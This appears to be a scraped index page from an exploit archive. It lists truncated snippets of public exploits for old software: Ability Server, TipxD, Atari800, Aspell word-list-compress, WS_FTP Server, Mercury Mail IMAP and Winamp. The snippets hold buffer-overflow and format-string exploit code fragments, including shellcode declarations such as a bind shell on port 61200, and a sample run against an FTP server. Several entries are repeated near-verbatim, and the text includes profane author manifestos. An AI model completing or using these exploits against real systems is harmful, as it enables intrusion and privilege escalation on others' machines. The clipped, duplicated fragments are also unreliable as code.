Ability Server 2.34 - 'APPE' Remote Buffer Overflow

/ TESTED ON WINXP SP0 RUS c by Dark Eagle from unl0ck research team http://unl0ck.void.ru HAPPY NEW YEAR! Greetz go out to: nekd0, antiq, fl0wsec setnf, nuTshell, nosystem CoKi, reflux... / include include include include // shellc0de by m00 team bind 61200 char shellcode=...

TipxD <= 1.1.1 Local Format String Vulnerability (not setuid)

No description provided by source. / tipxdexp.c TipxD Format String Vulnerability TipxD = 1.1.1 local exploit Proof of Concept Tested in Slackware 9.0 / 9.1 / 10.0 by CoKi [email protected] - SECU No System Group - http://www.nosystem.com.ar / include stdio.h include string.h define PATH...

TipxD 1.1.1 - Not SETUID Local Format String

/ tipxdexp.c TipxD Format String Vulnerability TipxD - SECU No System Group - http://www.nosystem.com.ar / include include define PATH "/bin/tipxd" define OBJDUMP "/usr/bin/objdump" define GREP "/usr/bin/grep" unsigned char shellcode= / aleph1 shellcode.45b /...

TipxD 1.1.1 - Not SETUID Local Format String

TipxD 1.1.1 - Not SETUID Local Format String / tipxdexp.c TipxD Format String Vulnerability TipxD - SECU No System Group - http://www.nosystem.com.ar / include include define PATH "/bin/tipxd" define OBJDUMP "/usr/bin/objdump" define GREP "/usr/bin/grep" unsigned char shellcode= / aleph1...

TipxD <= 1.1.1 Local Format String Vulnerability (not setuid)

Exploit for linux platform in category local exploits ============================================================= TipxD - SECU No System Group - http://www.nosystem.com.ar / include include define PATH "/bin/tipxd" define OBJDUMP "/usr/bin/objdump" define GREP "/usr/bin/grep" unsigned char...

atari800.txt

Name: Atari800 Vendor URL: http://atari800.sourceforge.net/ Author: Adam Zabrocki Date: November 20, 2004 Issue: Atari800 - free and portable Atari800/XL/XE/5200 emulator allows attacker to execute shellcode with privileges suid root, where Atari800 is installed. Description: Atari800 is free and...

Aspell (word-list-compress) - Command Line Stack Overflow

/ Fuck private exploits . Fuck iranian hacking and security !! teams who are just some fucking kiddies. Fuck all "Security money makers" word-list-compress local exploit - SECU Coded by : c0d3r / root . razavi1366atyahoodotcom word-list-compress is not setuid . so good for backdooring . gratz fly...

Aspell (word-list-compress) Command Line Stack Overflow

Exploit for linux platform in category local exploits ======================================================= Aspell word-list-compress Command Line Stack Overflow ======================================================= / Fuck private exploits . Fuck iranian hacking and security !! teams who are...

Aspell (word-list-compress) - Command Line Stack Overflow

Aspell word-list-compress - Command Line Stack Overflow / Fuck private exploits . Fuck iranian hacking and security !! teams who are just some fucking kiddies. Fuck all "Security money makers" word-list-compress local exploit - SECU Coded by : c0d3r / root . razavi1366atyahoodotcom...

Aspell (word-list-compress) Command Line Stack Overflow

No description provided by source. / Fuck private exploits . Fuck iranian hacking and security !! teams who are just some fucking kiddies. Fuck all "Security money makers" word-list-compress local exploit - SECU Coded by : c0d3r / root . razavi1366atyahoodotcom word-list-compress is not setuid . ...

Ipswitch WS_FTP Server 5.03 - MKD Remote Buffer Overflow

/ no@0x00:/Exploits/IPS-WSFTP$ ./IPSWSFTP-exploit 10.20.30.2 test test Ipswitch WSFTP Remote buffer overflow exploit by NoPh0BiA. x Connected to: 10.20.30.2 on port 21. x Sending Login..done. x Sending bad code..done. x Checking if exploitation was successful.. x Connected to: 10.20.30.2 on port...

Mercury32 Mail Server 4.01 - Pegasus IMAP Buffer Overflow (3)

Mercury32 Mail Server 4.01 - Pegasus IMAP Buffer Overflow 3 Mercury Mail 4.01 Pegasus IMAP Buffer Overflow Discovered by : Muts Coded by : Muts WWW.WHITEHAT.CO.IL Plain vanilla stack overflow in the SELECT command import struct import socket from time import sleep s = socket.socketsocket.AFINET,...

WS_FTP Server <= 5.03 MKD Remote Buffer Overflow Exploit

Exploit for unknown platform in category dos / poc ======================================================== WSFTP Server Greetz to Reed Arvin, NtWaK0,kane,schap, and kamalo : / include include include include include include include include define PORT 21 define RPORT 4444 define RET...

WS_FTP Server &lt;= 5.03 MKD Remote Buffer Overflow Exploit

No description provided by source. / no@0x00:/Exploits/IPS-WSFTP$ ./IPSWSFTP-exploit 10.20.30.2 test test Ipswitch WSFTP Remote buffer overflow exploit by NoPh0BiA. x Connected to: 10.20.30.2 on port 21. x Sending Login..done. x Sending bad code..done. x Checking if exploitation was successful.. ...

Mercury Mail 4.01 (Pegasus) IMAP Buffer Overflow Exploit

Exploit for unknown platform in category remote exploits ======================================================== Mercury Mail 4.01 Pegasus IMAP Buffer Overflow Exploit ======================================================== Mercury Mail 4.01 Pegasus IMAP Buffer Overflow Discovered by : Muts Cod...

Mercury/32 Mail Server 4.01 - &#039;Pegasus&#039; IMAP Buffer Overflow (3)

Mercury Mail 4.01 Pegasus IMAP Buffer Overflow Discovered by : Muts Coded by : Muts WWW.WHITEHAT.CO.IL Plain vanilla stack overflow in the SELECT command import struct import socket from time import sleep s = socket.socketsocket.AFINET, socket.SOCKSTREAM Lame calc.exe shellcode - dont expect...

atari800 Local Root Exploit

Exploit for linux platform in category local exploits =========================== atari800 Local Root Exploit =========================== / Exploit for atari800 by pi3 pi3ki31ny email protected:$ ./p ...::: -= exploit for Atari800 by pi3 pi3ki31ny =- :::... Ussage: + ./p options -? -v choose a bu...

atari800 - Local Privilege Escalation

atari800 - Local Privilege Escalation / Exploit for atari800 by pi3 pi3ki31ny pi3@pi3:$ ./p ...::: -= exploit for Atari800 by pi3 pi3ki31ny =- :::... Ussage: + ./p options -? -v choose a bug: 1 - first bug in all versions Atari800 2 - second bug in older Atari800 - modiy argv0 3 - third bug in...

Winamp 5.06 - IN_CDDA.dll Remote Buffer Overflow

Winamp 5.06 - INCDDA.dll Remote Buffer Overflow / Credits go to the author How to fix and study the bug: - The cdda library only reserves 20 bytes for names when files are ".cda" - run Winamp with ollye - when loaded locate and break at: 10009BBB 8D4C24 20 LEA ECX,DWORD PTR SS:ESP+20 10009BBF 84C...

Winamp <= 5.06 IN_CDDA.dll Remote Buffer Overflow Exploit

Exploit for unknown platform in category remote exploits ========================================================= Winamp //File ops. //m3u File format //http://hanna.pyxidis.org/tech/m3u.html // Host info: // Name=ntdll system // File version=5.1.2600.1217 xpsp2.030429-213 //...